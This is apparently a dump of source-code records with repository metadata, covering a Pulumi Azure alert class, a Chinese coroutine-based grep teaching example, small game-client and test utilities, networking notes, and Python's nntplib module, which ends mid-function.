the resource type of the target resource(s) on which the alert is created/updated. Mandatory for MultipleResourceMultipleMetricCriteria.
"""
return pulumi.get(self, "target_resource_type")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Azure resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="windowSize")
def window_size(self) -> pulumi.Output[str]:
"""
the period of time (in ISO 8601 duration format) that is used to monitor alert activity based on the threshold.
"""
return pulumi.get(self, "window_size")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
d59bcbbad39d74bcd294b6117bc8ca2b88bc83fe | 4f0385a90230c0fe808e8672bb5b8abcceb43783 | /LNH/day4-teacher/5 面向过程编程.py | 77d4e49cfd933d7a8fd11f330b2d27488f5bcdea | [] | no_license | lincappu/pycharmlearningproject | 4084dab7adde01db9fa82a12769a67e8b26b3382 | b501523e417b61373688ba12f11b384166baf489 | refs/heads/master | 2023-07-10T05:21:15.163393 | 2023-06-29T14:02:35 | 2023-06-29T14:02:35 | 113,925,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | '''
强调:面向过程编程绝对不是用函数编程那么简单
面向过程的编程思想:核心是过程二字,过程即解决问题的步骤,即先干什么再干什么
基于该思想去编写程序就好比在设计一条流水线,是一种机械式的编程思想
优点:复杂的问题流程化,进而简单化
缺点:可扩展性差
'''
# import os
# g=os.walk(r'C:\Users\Administrator\PycharmProjects\19期\day4\a')
# for dirname,_,files in g:
# for file in files:
# abs_file_path=r'%s\%s' %(dirname,file)
# print(abs_file_path)
#grep -rl 'root' /etc
import os
def init(func):
def inner(*args,**kwargs):
g=func(*args,**kwargs)
next(g)
return g
return inner
def search(filepath,target): #找到一个文件路径就往下个阶段传一次
g = os.walk(filepath)
for dirname, _, files in g:
for file in files:
abs_file_path = r'%s\%s' % (dirname, file)
target.send(abs_file_path)
@init
def opener(target):
while True:
abs_file_path=yield
with open(abs_file_path,'rb') as f:
target.send((f,abs_file_path))
@init
def cat(target):
while True:
f,abs_file_path=yield
for line in f:
res=target.send((line,abs_file_path))
if res:
break
@init
def grep(pattern,target):
tag=False
pattern = pattern.encode('utf-8')
while True:
line,abs_file_path=yield tag
tag=False
if pattern in line:
target.send(abs_file_path)
tag=True
@init
def printer():
while True:
abs_file_path=yield
print(abs_file_path)
search(r'C:\Users\Administrator\PycharmProjects\19期\day4\a',opener(cat(grep('你好',printer()))))
| [
"lincappu@163.com"
] | lincappu@163.com |
38ffb9f0f778b5e8343554b367df1434ad7e94bf | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/dogma/eventCounters.py | abbf36a0815d4c95154b8703ffd3d80fd198ea7f | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 1,191 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\dogma\eventCounters.py
from contextlib import contextmanager
class EventCount(object):
def __init__(self):
self.__eventCount = {}
@contextmanager
def Event(self, key):
self._AddEventCount(key)
try:
yield
finally:
self._DecreaseEventCount(key)
self._OnEvent(key)
def _AddEventCount(self, key):
if key not in self.__eventCount:
self.__eventCount[key] = 1
else:
self.__eventCount[key] += 1
def _DecreaseEventCount(self, key):
self.__eventCount[key] -= 1
if self.__eventCount[key] < 1:
del self.__eventCount[key]
def IsEventHappening(self, key):
if key is None:
return False
return self.__eventCount.get(key, 0) > 0
def _OnEvent(self, key):
pass
class BrainUpdate(EventCount):
def __init__(self, callback):
super(BrainUpdate, self).__init__()
self.__callback = callback
def _OnEvent(self, key):
self.__callback(key)
| [
"masaho.shiro@gmail.com"
] | masaho.shiro@gmail.com |
f989dc9c65e8f3ba691c10722a36b9be7e818a0a | e7bba3dd662bf2778c36a406f72ee93b2ea05e11 | /CardinalityEstimationTestbed/Overall/quicksel/test/python/test_include.py | 4f19223fb4f8307520b7d4b1f74308bb4c36e7ba | [
"Apache-2.0"
] | permissive | TsinghuaDatabaseGroup/AI4DBCode | 37e45b176bc94e77fe250ea45f0ad7b9054c7f11 | a8989bfadcf551ee1dee2aec57ef6b2709c9f85d | refs/heads/master | 2023-07-07T05:42:15.590000 | 2023-07-04T01:04:15 | 2023-07-04T01:04:15 | 217,175,047 | 53 | 35 | null | 2023-06-20T13:00:17 | 2019-10-24T00:03:14 | Scala | UTF-8 | Python | false | false | 688 | py | import sys
sys.path.append('../../src/python')
# isomer = imp.load_source('isomer', '../../src/python/isomer.py')
# import imp
import pprint
from quickSel import isomer
pp = pprint.PrettyPrinter(indent=2)
def Node(query):
return isomer.STHoles2d(query.boundary, [query])
def Query(boundary, freq, uid=None):
return isomer.Query2d(boundary, freq, uid)
def Boundary(boundary):
return isomer.Boundary(boundary)
qid = [0]
def gen_query(boundary):
boundary = isomer.Boundary(boundary)
freq = (boundary.r - boundary.l) * (boundary.t - boundary.b)
query = Query(boundary, freq, qid[0])
qid[0] = qid[0] + 1
return query
| [
"zhouxuan19@mails.tsinghua.edu.cn"
] | zhouxuan19@mails.tsinghua.edu.cn |
a35bae9f502d173b1fff236cf84aff4322441cb5 | a2211f0ef8297a77200a0b2eec8ba3476989b7e6 | /itcast/02_python核心编程/03_网络编程/day03_网络通信过程/demo16_网络通信过程中的MAC地址_IP地址.py | 25e25fb3f3e669b8dbe1ab7815b5d62ae64cb664 | [] | no_license | qq1197977022/learnPython | f720ecffd2a70044f1644f3527f4c29692eb2233 | ba294b8fa930f784304771be451d7b5981b794f3 | refs/heads/master | 2020-03-25T09:23:12.407510 | 2018-09-16T00:41:56 | 2018-09-16T00:42:00 | 143,663,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | # 一.通信过程中
# 1.源/目的MAC地址在两个设备间变化
# 2.源/目的IP地址不变
# 二.总结
# 1.MAC地址: 唯一标识数据转发的实际网卡地址
# 2.IP地址: 唯一标识逻辑地址
# 3.网络掩码: 协助确认网络号
# 4.默认网关: 目的IP不在同一网段时, 转发给默认网关
# 5.端口: 唯一标识非同一台设备上的应用
# 6.PED: 唯一标识同一台设备上的应用
| [
"1197977022@qq.com"
] | 1197977022@qq.com |
f545ab96abec98ed85e1c53c4d829e3969265b38 | 02680f3057c3acd9c5a70474d37f76ac9fe39cd2 | /Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Lib/nntplib.py | fcb01d319b49ea0afe298ba08fdec275f603e7c4 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Python-2.0"
] | permissive | tpsatish95/Python-Workshop | 1b43e25487b48d51185947e244845b41f199da6f | 5f4da07c96cfd0ae76a502efc8acb94409347946 | refs/heads/master | 2022-11-04T02:31:49.286334 | 2017-02-26T13:35:29 | 2017-02-26T13:35:29 | 44,395,862 | 1 | 2 | Apache-2.0 | 2022-10-21T00:22:22 | 2015-10-16T16:02:24 | Python | UTF-8 | Python | false | false | 42,807 | py | """An NNTP client class based on:
- RFC 977: Network News Transfer Protocol
- RFC 2980: Common NNTP Extensions
- RFC 3977: Network News Transfer Protocol (version 2)
Example:
>>> from nntplib import NNTP
>>> s = NNTP('news')
>>> resp, count, first, last, name = s.group('comp.lang.python')
>>> print('Group', name, 'has', count, 'articles, range', first, 'to', last)
Group comp.lang.python has 51 articles, range 5770 to 5821
>>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last))
>>> resp = s.quit()
>>>
Here 'resp' is the server response line.
Error responses are turned into exceptions.
To post an article from a file:
>>> f = open(filename, 'rb') # file containing article, including header
>>> resp = s.post(f)
>>>
For descriptions of all methods, read the comments in the code below.
Note that all arguments and return values representing article numbers
are strings, not numbers, since they are rarely used for calculations.
"""
# RFC 977 by Brian Kantor and Phil Lapsley.
# xover, xgtitle, xpath, date methods by Kevan Heydon
# Incompatible changes from the 2.x nntplib:
# - all commands are encoded as UTF-8 data (using the "surrogateescape"
# error handler), except for raw message data (POST, IHAVE)
# - all responses are decoded as UTF-8 data (using the "surrogateescape"
# error handler), except for raw message data (ARTICLE, HEAD, BODY)
# - the `file` argument to various methods is keyword-only
#
# - NNTP.date() returns a datetime object
# - NNTP.newgroups() and NNTP.newnews() take a datetime (or date) object,
# rather than a pair of (date, time) strings.
# - NNTP.newgroups() and NNTP.list() return a list of GroupInfo named tuples
# - NNTP.descriptions() returns a dict mapping group names to descriptions
# - NNTP.xover() returns a list of dicts mapping field names (header or metadata)
# to field values; each dict representing a message overview.
# - NNTP.article(), NNTP.head() and NNTP.body() return a (response, ArticleInfo)
# tuple.
# - the "internal" methods have been marked private (they now start with
# an underscore)
# Other changes from the 2.x/3.1 nntplib:
# - automatic querying of capabilities at connect
# - New method NNTP.getcapabilities()
# - New method NNTP.over()
# - New helper function decode_header()
# - NNTP.post() and NNTP.ihave() accept file objects, bytes-like objects and
# arbitrary iterables yielding lines.
# - An extensive test suite :-)
# TODO:
# - return structured data (GroupInfo etc.) everywhere
# - support HDR
# Imports
import re
import socket
import collections
import datetime
import warnings
try:
import ssl
except ImportError:
_have_ssl = False
else:
_have_ssl = True
from email.header import decode_header as _email_decode_header
from socket import _GLOBAL_DEFAULT_TIMEOUT
__all__ = ["NNTP",
"NNTPReplyError", "NNTPTemporaryError", "NNTPPermanentError",
"NNTPProtocolError", "NNTPDataError",
"decode_header",
]
# maximal line length when calling readline(). This is to prevent
# reading arbitrary lenght lines. RFC 3977 limits NNTP line length to
# 512 characters, including CRLF. We have selected 2048 just to be on
# the safe side.
_MAXLINE = 2048
# Exceptions raised when an error or invalid response is received
class NNTPError(Exception):
"""Base class for all nntplib exceptions"""
def __init__(self, *args):
Exception.__init__(self, *args)
try:
self.response = args[0]
except IndexError:
self.response = 'No response given'
class NNTPReplyError(NNTPError):
"""Unexpected [123]xx reply"""
pass
class NNTPTemporaryError(NNTPError):
"""4xx errors"""
pass
class NNTPPermanentError(NNTPError):
"""5xx errors"""
pass
class NNTPProtocolError(NNTPError):
"""Response does not begin with [1-5]"""
pass
class NNTPDataError(NNTPError):
"""Error in response data"""
pass
# Standard port used by NNTP servers
NNTP_PORT = 119
NNTP_SSL_PORT = 563
# Response numbers that are followed by additional text (e.g. article)
_LONGRESP = {
'100', # HELP
'101', # CAPABILITIES
'211', # LISTGROUP (also not multi-line with GROUP)
'215', # LIST
'220', # ARTICLE
'221', # HEAD, XHDR
'222', # BODY
'224', # OVER, XOVER
'225', # HDR
'230', # NEWNEWS
'231', # NEWGROUPS
'282', # XGTITLE
}
# Default decoded value for LIST OVERVIEW.FMT if not supported
_DEFAULT_OVERVIEW_FMT = [
"subject", "from", "date", "message-id", "references", ":bytes", ":lines"]
# Alternative names allowed in LIST OVERVIEW.FMT response
_OVERVIEW_FMT_ALTERNATIVES = {
'bytes': ':bytes',
'lines': ':lines',
}
# Line terminators (we always output CRLF, but accept any of CRLF, CR, LF)
_CRLF = b'\r\n'
GroupInfo = collections.namedtuple('GroupInfo',
['group', 'last', 'first', 'flag'])
ArticleInfo = collections.namedtuple('ArticleInfo',
['number', 'message_id', 'lines'])
# Helper function(s)
def decode_header(header_str):
"""Takes an unicode string representing a munged header value
and decodes it as a (possibly non-ASCII) readable value."""
parts = []
for v, enc in _email_decode_header(header_str):
if isinstance(v, bytes):
parts.append(v.decode(enc or 'ascii'))
else:
parts.append(v)
return ''.join(parts)
def _parse_overview_fmt(lines):
"""Parse a list of string representing the response to LIST OVERVIEW.FMT
and return a list of header/metadata names.
Raises NNTPDataError if the response is not compliant
(cf. RFC 3977, section 8.4)."""
fmt = []
for line in lines:
if line[0] == ':':
# Metadata name (e.g. ":bytes")
name, _, suffix = line[1:].partition(':')
name = ':' + name
else:
# Header name (e.g. "Subject:" or "Xref:full")
name, _, suffix = line.partition(':')
name = name.lower()
name = _OVERVIEW_FMT_ALTERNATIVES.get(name, name)
# Should we do something with the suffix?
fmt.append(name)
defaults = _DEFAULT_OVERVIEW_FMT
if len(fmt) < len(defaults):
raise NNTPDataError("LIST OVERVIEW.FMT response too short")
if fmt[:len(defaults)] != defaults:
raise NNTPDataError("LIST OVERVIEW.FMT redefines default fields")
return fmt
def _parse_overview(lines, fmt, data_process_func=None):
"""Parse the response to a OVER or XOVER command according to the
overview format `fmt`."""
n_defaults = len(_DEFAULT_OVERVIEW_FMT)
overview = []
for line in lines:
fields = {}
article_number, *tokens = line.split('\t')
article_number = int(article_number)
for i, token in enumerate(tokens):
if i >= len(fmt):
# XXX should we raise an error? Some servers might not
# support LIST OVERVIEW.FMT and still return additional
# headers.
continue
field_name = fmt[i]
is_metadata = field_name.startswith(':')
if i >= n_defaults and not is_metadata:
# Non-default header names are included in full in the response
# (unless the field is totally empty)
h = field_name + ": "
if token and token[:len(h)].lower() != h:
raise NNTPDataError("OVER/XOVER response doesn't include "
"names of additional headers")
token = token[len(h):] if token else None
fields[fmt[i]] = token
overview.append((article_number, fields))
return overview
def _parse_datetime(date_str, time_str=None):
"""Parse a pair of (date, time) strings, and return a datetime object.
If only the date is given, it is assumed to be date and time
concatenated together (e.g. response to the DATE command).
"""
if time_str is None:
time_str = date_str[-6:]
date_str = date_str[:-6]
hours = int(time_str[:2])
minutes = int(time_str[2:4])
seconds = int(time_str[4:])
year = int(date_str[:-4])
month = int(date_str[-4:-2])
day = int(date_str[-2:])
# RFC 3977 doesn't say how to interpret 2-char years. Assume that
# there are no dates before 1970 on Usenet.
if year < 70:
year += 2000
elif year < 100:
year += 1900
return datetime.datetime(year, month, day, hours, minutes, seconds)
def _unparse_datetime(dt, legacy=False):
"""Format a date or datetime object as a pair of (date, time) strings
in the format required by the NEWNEWS and NEWGROUPS commands. If a
date object is passed, the time is assumed to be midnight (00h00).
The returned representation depends on the legacy flag:
* if legacy is False (the default):
date has the YYYYMMDD format and time the HHMMSS format
* if legacy is True:
date has the YYMMDD format and time the HHMMSS format.
RFC 3977 compliant servers should understand both formats; therefore,
legacy is only needed when talking to old servers.
"""
if not isinstance(dt, datetime.datetime):
time_str = "000000"
else:
time_str = "{0.hour:02d}{0.minute:02d}{0.second:02d}".format(dt)
y = dt.year
if legacy:
y = y % 100
date_str = "{0:02d}{1.month:02d}{1.day:02d}".format(y, dt)
else:
date_str = "{0:04d}{1.month:02d}{1.day:02d}".format(y, dt)
return date_str, time_str
if _have_ssl:
def _encrypt_on(sock, context, hostname):
"""Wrap a socket in SSL/TLS. Arguments:
- sock: Socket to wrap
- context: SSL context to use for the encrypted connection
Returns:
- sock: New, encrypted socket.
"""
# Generate a default SSL context if none was passed.
if context is None:
context = ssl._create_stdlib_context()
server_hostname = hostname if ssl.HAS_SNI else None
return context.wrap_socket(sock, server_hostname=server_hostname)
# The classes themselves
class _NNTPBase:
# UTF-8 is the character set for all NNTP commands and responses: they
# are automatically encoded (when sending) and decoded (and receiving)
# by this class.
# However, some multi-line data blocks can contain arbitrary bytes (for
# example, latin-1 or utf-16 data in the body of a message). Commands
# taking (POST, IHAVE) or returning (HEAD, BODY, ARTICLE) raw message
# data will therefore only accept and produce bytes objects.
# Furthermore, since there could be non-compliant servers out there,
# we use 'surrogateescape' as the error handler for fault tolerance
# and easy round-tripping. This could be useful for some applications
# (e.g. NNTP gateways).
encoding = 'utf-8'
errors = 'surrogateescape'
def __init__(self, file, host,
readermode=None, timeout=_GLOBAL_DEFAULT_TIMEOUT):
"""Initialize an instance. Arguments:
- file: file-like object (open for read/write in binary mode)
- host: hostname of the server
- readermode: if true, send 'mode reader' command after
connecting.
- timeout: timeout (in seconds) used for socket connections
readermode is sometimes necessary if you are connecting to an
NNTP server on the local machine and intend to call
reader-specific commands, such as `group'. If you get
unexpected NNTPPermanentErrors, you might need to set
readermode.
"""
self.host = host
self.file = file
self.debugging = 0
self.welcome = self._getresp()
# Inquire about capabilities (RFC 3977).
self._caps = None
self.getcapabilities()
# 'MODE READER' is sometimes necessary to enable 'reader' mode.
# However, the order in which 'MODE READER' and 'AUTHINFO' need to
# arrive differs between some NNTP servers. If _setreadermode() fails
# with an authorization failed error, it will set this to True;
# the login() routine will interpret that as a request to try again
# after performing its normal function.
# Enable only if we're not already in READER mode anyway.
self.readermode_afterauth = False
if readermode and 'READER' not in self._caps:
self._setreadermode()
if not self.readermode_afterauth:
# Capabilities might have changed after MODE READER
self._caps = None
self.getcapabilities()
# RFC 4642 2.2.2: Both the client and the server MUST know if there is
# a TLS session active. A client MUST NOT attempt to start a TLS
# session if a TLS session is already active.
self.tls_on = False
# Log in and encryption setup order is left to subclasses.
self.authenticated = False
def __enter__(self):
return self
def __exit__(self, *args):
is_connected = lambda: hasattr(self, "file")
if is_connected():
try:
self.quit()
except (OSError, EOFError):
pass
finally:
if is_connected():
self._close()
def getwelcome(self):
"""Get the welcome message from the server
(this is read and squirreled away by __init__()).
If the response code is 200, posting is allowed;
if it 201, posting is not allowed."""
if self.debugging: print('*welcome*', repr(self.welcome))
return self.welcome
def getcapabilities(self):
"""Get the server capabilities, as read by __init__().
If the CAPABILITIES command is not supported, an empty dict is
returned."""
if self._caps is None:
self.nntp_version = 1
self.nntp_implementation = None
try:
resp, caps = self.capabilities()
except (NNTPPermanentError, NNTPTemporaryError):
# Server doesn't support capabilities
self._caps = {}
else:
self._caps = caps
if 'VERSION' in caps:
# The server can advertise several supported versions,
# choose the highest.
self.nntp_version = max(map(int, caps['VERSION']))
if 'IMPLEMENTATION' in caps:
self.nntp_implementation = ' '.join(caps['IMPLEMENTATION'])
return self._caps
def set_debuglevel(self, level):
"""Set the debugging level. Argument 'level' means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
2: also print raw lines read and sent before stripping CR/LF"""
self.debugging = level
debug = set_debuglevel
def _putline(self, line):
"""Internal: send one line to the server, appending CRLF.
The `line` must be a bytes-like object."""
line = line + _CRLF
if self.debugging > 1: print('*put*', repr(line))
self.file.write(line)
self.file.flush()
def _putcmd(self, line):
"""Internal: send one command to the server (through _putline()).
The `line` must be an unicode string."""
if self.debugging: print('*cmd*', repr(line))
line = line.encode(self.encoding, self.errors)
self._putline(line)
def _getline(self, strip_crlf=True):
"""Internal: return one line from the server, stripping _CRLF.
Raise EOFError if the connection is closed.
Returns a bytes object."""
line = self.file.readline(_MAXLINE +1)
if len(line) > _MAXLINE:
raise NNTPDataError('line too long')
if self.debugging > 1:
print('*get*', repr(line))
if not line: raise EOFError
if strip_crlf:
if line[-2:] == _CRLF:
line = line[:-2]
elif line[-1:] in _CRLF:
line = line[:-1]
return line
def _getresp(self):
"""Internal: get a response from the server.
Raise various errors if the response indicates an error.
Returns an unicode string."""
resp = self._getline()
if self.debugging: print('*resp*', repr(resp))
resp = resp.decode(self.encoding, self.errors)
c = resp[:1]
if c == '4':
raise NNTPTemporaryError(resp)
if c == '5':
raise NNTPPermanentError(resp)
if c not in '123':
raise NNTPProtocolError(resp)
return resp
def _getlongresp(self, file=None):
"""Internal: get a response plus following text from the server.
Raise various errors if the response indicates an error.
Returns a (response, lines) tuple where `response` is an unicode
string and `lines` is a list of bytes objects.
If `file` is a file-like object, it must be open in binary mode.
"""
openedFile = None
try:
# If a string was passed then open a file with that name
if isinstance(file, (str, bytes)):
openedFile = file = open(file, "wb")
resp = self._getresp()
if resp[:3] not in _LONGRESP:
raise NNTPReplyError(resp)
lines = []
if file is not None:
# XXX lines = None instead?
terminators = (b'.' + _CRLF, b'.\n')
while 1:
line = self._getline(False)
if line in terminators:
break
if line.startswith(b'..'):
line = line[1:]
file.write(line)
else:
terminator = b'.'
while 1:
line = self._getline()
if line == terminator:
break
if line.startswith(b'..'):
line = line[1:]
lines.append(line)
finally:
# If this method created the file, then it must close it
if openedFile:
openedFile.close()
return resp, lines
def _shortcmd(self, line):
"""Internal: send a command and get the response.
Same return value as _getresp()."""
self._putcmd(line)
return self._getresp()
def _longcmd(self, line, file=None):
"""Internal: send a command and get the response plus following text.
Same return value as _getlongresp()."""
self._putcmd(line)
return self._getlongresp(file)
def _longcmdstring(self, line, file=None):
"""Internal: send a command and get the response plus following text.
Same as _longcmd() and _getlongresp(), except that the returned `lines`
are unicode strings rather than bytes objects.
"""
self._putcmd(line)
resp, list = self._getlongresp(file)
return resp, [line.decode(self.encoding, self.errors)
for line in list]
def _getoverviewfmt(self):
"""Internal: get the overview format. Queries the server if not
already done, else returns the cached value."""
try:
return self._cachedoverviewfmt
except AttributeError:
pass
try:
resp, lines = self._longcmdstring("LIST OVERVIEW.FMT")
except NNTPPermanentError:
# Not supported by server?
fmt = _DEFAULT_OVERVIEW_FMT[:]
else:
fmt = _parse_overview_fmt(lines)
self._cachedoverviewfmt = fmt
return fmt
def _grouplist(self, lines):
# Parse lines into "group last first flag"
return [GroupInfo(*line.split()) for line in lines]
def capabilities(self):
"""Process a CAPABILITIES command. Not supported by all servers.
Return:
- resp: server response if successful
- caps: a dictionary mapping capability names to lists of tokens
(for example {'VERSION': ['2'], 'OVER': [], LIST: ['ACTIVE', 'HEADERS'] })
"""
caps = {}
resp, lines = self._longcmdstring("CAPABILITIES")
for line in lines:
name, *tokens = line.split()
caps[name] = tokens
return resp, caps
def newgroups(self, date, *, file=None):
"""Process a NEWGROUPS command. Arguments:
- date: a date or datetime object
Return:
- resp: server response if successful
- list: list of newsgroup names
"""
if not isinstance(date, (datetime.date, datetime.date)):
raise TypeError(
"the date parameter must be a date or datetime object, "
"not '{:40}'".format(date.__class__.__name__))
date_str, time_str = _unparse_datetime(date, self.nntp_version < 2)
cmd = 'NEWGROUPS {0} {1}'.format(date_str, time_str)
resp, lines = self._longcmdstring(cmd, file)
return resp, self._grouplist(lines)
def newnews(self, group, date, *, file=None):
"""Process a NEWNEWS command. Arguments:
- group: group name or '*'
- date: a date or datetime object
Return:
- resp: server response if successful
- list: list of message ids
"""
if not isinstance(date, (datetime.date, datetime.date)):
raise TypeError(
"the date parameter must be a date or datetime object, "
"not '{:40}'".format(date.__class__.__name__))
date_str, time_str = _unparse_datetime(date, self.nntp_version < 2)
cmd = 'NEWNEWS {0} {1} {2}'.format(group, date_str, time_str)
return self._longcmdstring(cmd, file)
def list(self, group_pattern=None, *, file=None):
"""Process a LIST or LIST ACTIVE command. Arguments:
- group_pattern: a pattern indicating which groups to query
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of (group, last, first, flag) (strings)
"""
if group_pattern is not None:
command = 'LIST ACTIVE ' + group_pattern
else:
command = 'LIST'
resp, lines = self._longcmdstring(command, file)
return resp, self._grouplist(lines)
def _getdescriptions(self, group_pattern, return_all):
line_pat = re.compile('^(?P<group>[^ \t]+)[ \t]+(.*)$')
# Try the more std (acc. to RFC2980) LIST NEWSGROUPS first
resp, lines = self._longcmdstring('LIST NEWSGROUPS ' + group_pattern)
if not resp.startswith('215'):
# Now the deprecated XGTITLE. This either raises an error
# or succeeds with the same output structure as LIST
# NEWSGROUPS.
resp, lines = self._longcmdstring('XGTITLE ' + group_pattern)
groups = {}
for raw_line in lines:
match = line_pat.search(raw_line.strip())
if match:
name, desc = match.group(1, 2)
if not return_all:
return desc
groups[name] = desc
if return_all:
return resp, groups
else:
# Nothing found
return ''
def description(self, group):
"""Get a description for a single group. If more than one
group matches ('group' is a pattern), return the first. If no
group matches, return an empty string.
This elides the response code from the server, since it can
only be '215' or '285' (for xgtitle) anyway. If the response
code is needed, use the 'descriptions' method.
NOTE: This neither checks for a wildcard in 'group' nor does
it check whether the group actually exists."""
return self._getdescriptions(group, False)
def descriptions(self, group_pattern):
"""Get descriptions for a range of groups."""
return self._getdescriptions(group_pattern, True)
def group(self, name):
"""Process a GROUP command. Argument:
- group: the group name
Returns:
- resp: server response if successful
- count: number of articles
- first: first article number
- last: last article number
- name: the group name
"""
resp = self._shortcmd('GROUP ' + name)
if not resp.startswith('211'):
raise NNTPReplyError(resp)
words = resp.split()
count = first = last = 0
n = len(words)
if n > 1:
count = words[1]
if n > 2:
first = words[2]
if n > 3:
last = words[3]
if n > 4:
name = words[4].lower()
return resp, int(count), int(first), int(last), name
def help(self, *, file=None):
"""Process a HELP command. Argument:
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of strings returned by the server in response to the
HELP command
"""
return self._longcmdstring('HELP', file)
def _statparse(self, resp):
"""Internal: parse the response line of a STAT, NEXT, LAST,
ARTICLE, HEAD or BODY command."""
if not resp.startswith('22'):
raise NNTPReplyError(resp)
words = resp.split()
art_num = int(words[1])
message_id = words[2]
return resp, art_num, message_id
def _statcmd(self, line):
"""Internal: process a STAT, NEXT or LAST command."""
resp = self._shortcmd(line)
return self._statparse(resp)
def stat(self, message_spec=None):
"""Process a STAT command. Argument:
- message_spec: article number or message id (if not specified,
the current article is selected)
Returns:
- resp: server response if successful
- art_num: the article number
- message_id: the message id
"""
if message_spec:
return self._statcmd('STAT {0}'.format(message_spec))
else:
return self._statcmd('STAT')
def next(self):
"""Process a NEXT command. No arguments. Return as for STAT."""
return self._statcmd('NEXT')
def last(self):
"""Process a LAST command. No arguments. Return as for STAT."""
return self._statcmd('LAST')
def _artcmd(self, line, file=None):
"""Internal: process a HEAD, BODY or ARTICLE command."""
resp, lines = self._longcmd(line, file)
resp, art_num, message_id = self._statparse(resp)
return resp, ArticleInfo(art_num, message_id, lines)
def head(self, message_spec=None, *, file=None):
"""Process a HEAD command. Argument:
- message_spec: article number or message id
- file: filename string or file object to store the headers in
Returns:
- resp: server response if successful
- ArticleInfo: (article number, message id, list of header lines)
"""
if message_spec is not None:
cmd = 'HEAD {0}'.format(message_spec)
else:
cmd = 'HEAD'
return self._artcmd(cmd, file)
def body(self, message_spec=None, *, file=None):
"""Process a BODY command. Argument:
- message_spec: article number or message id
- file: filename string or file object to store the body in
Returns:
- resp: server response if successful
- ArticleInfo: (article number, message id, list of body lines)
"""
if message_spec is not None:
cmd = 'BODY {0}'.format(message_spec)
else:
cmd = 'BODY'
return self._artcmd(cmd, file)
def article(self, message_spec=None, *, file=None):
"""Process an ARTICLE command. Argument:
- message_spec: article number or message id
- file: filename string or file object to store the article in
Returns:
- resp: server response if successful
- ArticleInfo: (article number, message id, list of article lines)
"""
if message_spec is not None:
cmd = 'ARTICLE {0}'.format(message_spec)
else:
cmd = 'ARTICLE'
return self._artcmd(cmd, file)
def slave(self):
"""Process a SLAVE command. Returns:
- resp: server response if successful
"""
return self._shortcmd('SLAVE')
def xhdr(self, hdr, str, *, file=None):
"""Process an XHDR command (optional server extension). Arguments:
- hdr: the header type (e.g. 'subject')
- str: an article nr, a message id, or a range nr1-nr2
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of (nr, value) strings
"""
pat = re.compile('^([0-9]+) ?(.*)\n?')
resp, lines = self._longcmdstring('XHDR {0} {1}'.format(hdr, str), file)
def remove_number(line):
m = pat.match(line)
return m.group(1, 2) if m else line
return resp, [remove_number(line) for line in lines]
def xover(self, start, end, *, file=None):
"""Process an XOVER command (optional server extension) Arguments:
- start: start of range
- end: end of range
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of dicts containing the response fields
"""
resp, lines = self._longcmdstring('XOVER {0}-{1}'.format(start, end),
file)
fmt = self._getoverviewfmt()
return resp, _parse_overview(lines, fmt)
def over(self, message_spec, *, file=None):
"""Process an OVER command. If the command isn't supported, fall
back to XOVER. Arguments:
- message_spec:
- either a message id, indicating the article to fetch
information about
- or a (start, end) tuple, indicating a range of article numbers;
if end is None, information up to the newest message will be
retrieved
- or None, indicating the current article number must be used
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of dicts containing the response fields
NOTE: the "message id" form isn't supported by XOVER
"""
cmd = 'OVER' if 'OVER' in self._caps else 'XOVER'
if isinstance(message_spec, (tuple, list)):
start, end = message_spec
cmd += ' {0}-{1}'.format(start, end or '')
elif message_spec is not None:
cmd = cmd + ' ' + message_spec
resp, lines = self._longcmdstring(cmd, file)
fmt = self._getoverviewfmt()
return resp, _parse_overview(lines, fmt)
def xgtitle(self, group, *, file=None):
"""Process an XGTITLE command (optional server extension) Arguments:
- group: group name wildcard (i.e. news.*)
Returns:
- resp: server response if successful
- list: list of (name,title) strings"""
warnings.warn("The XGTITLE extension is not actively used, "
"use descriptions() instead",
DeprecationWarning, 2)
line_pat = re.compile('^([^ \t]+)[ \t]+(.*)$')
resp, raw_lines = self._longcmdstring('XGTITLE ' + group, file)
lines = []
for raw_line in raw_lines:
match = line_pat.search(raw_line.strip())
if match:
lines.append(match.group(1, 2))
return resp, lines
def xpath(self, id):
"""Process an XPATH command (optional server extension) Arguments:
- id: Message id of article
Returns:
resp: server response if successful
path: directory path to article
"""
warnings.warn("The XPATH extension is not actively used",
DeprecationWarning, 2)
resp = self._shortcmd('XPATH {0}'.format(id))
if not resp.startswith('223'):
raise NNTPReplyError(resp)
try:
[resp_num, path] = resp.split()
except ValueError:
raise NNTPReplyError(resp)
else:
return resp, path
def date(self):
"""Process the DATE command.
Returns:
- resp: server response if successful
- date: datetime object
"""
resp = self._shortcmd("DATE")
if not resp.startswith('111'):
raise NNTPReplyError(resp)
elem = resp.split()
if len(elem) != 2:
raise NNTPDataError(resp)
date = elem[1]
if len(date) != 14:
raise NNTPDataError(resp)
return resp, _parse_datetime(date, None)
def _post(self, command, f):
resp = self._shortcmd(command)
# Raises a specific exception if posting is not allowed
